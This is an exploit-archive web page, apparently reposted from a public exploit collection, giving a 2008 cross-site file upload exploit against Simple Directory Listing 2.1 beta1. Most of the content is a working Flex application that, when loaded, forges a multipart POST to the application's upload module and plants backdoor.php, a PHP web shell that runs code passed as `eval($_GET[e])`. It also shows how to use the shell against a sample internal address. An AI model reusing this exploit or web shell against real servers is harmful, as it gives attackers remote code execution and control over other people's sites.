首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Simple Directory Listing 2 Cross Site File Upload Vulnerability
来源:www.vfcocus.net 作者:Brooks 发布时间:2008-12-09  
Simple Directory Listing 2 - Cross Site File Upload
--------------------------------------------------------------------------------
<mx:Application xmlns:mx="http://www.adobe.com/2006/mxml" creationComplete="onAppInit()">
<mx:Script>
/* 
Written by Michael Brooks

VUlerablity type: Cross Site File Upload.
Affects: SDL 2.1 beta1
Product homepage: http://simpledirectorylisting.net/

SDL has 22+ million downloads from sourceforge.net!
The top three php projects where hacked in one day using .

Exploit built using Flex 3.2 (http://www.adobe.com/go/flex_trial)
uploads ./backdoor.php in the same directory as SDL2.php
Backdoor Useage:
http://10.1.1.155/backdoor.php?e=phpinfo();
backdoor code:
<?php eval($_GET[e])?>

More info on Cross Site File Upload Attacks:
http://www.gnucitizen.org/blog/cross-site-file-upload-attacks/
Inspired by the work of Petko D. Petkov; pdp
* GNUCITIZEN
**/
import flash.net.*;
private function onAppInit():void{
var request:URLRequest = new URLRequest("http://10.1.1.155/SDL2.php?action=module&amp;module=ModuleUpload&amp;moduleParams[action]=upload&amp;moduleParams[cwdRelPath]=");
request.requestHeaders.push(new URLRequestHeader('Content-Type', 'multipart/form-data; boundary=---------------------------109092118919201'));      
request.data = unescape('-----------------------------109092118919201%0D%0AContent-Disposition%3A form-data%3B name%3D%22file%22%3B filename%3D%22backdoor.php%22%0D%0AContent-Type%3A text%2Fplain%0D%0A%0D%0A%3C%3Fphp eval%28stripslashes%28%24_GET%5Be%5D%29%29%3F%3E%0D%0A-----------------------------109092118919201%0D%0AContent-Disposition%3A form-data%3B name%3D%22upload%22%0D%0A%0D%0AUpload%0D%0A-----------------------------109092118919201--%0A');
request.method = URLRequestMethod.POST;
    navigateToURL(request, '_self');
}
</mx:Script>
</mx:Application>

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·phpMyAdmin 3.1.0 (XSRF) SQL In
·XAMPP 1.6.8 (XSRF) Change Admi
·SIU Guarani Multiple Remote Vu
·phpBB 3 (Mod Tag Board <= 4) R
·MG2 0.5.1 (filename) Remote Co
·Neostrada Livebox Router Remot
·DD-WRT v24-sp1 (XSRF) Cross Si
·w3blabor CMS 3.0.5 Arbitrary F
·PayPal eStore Admin Password C
·Bonza Cart <= 1.10 Admin Passw
·linux x86 shellcode obfuscator
·DL PayCart <= 1.34 Admin Passw
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved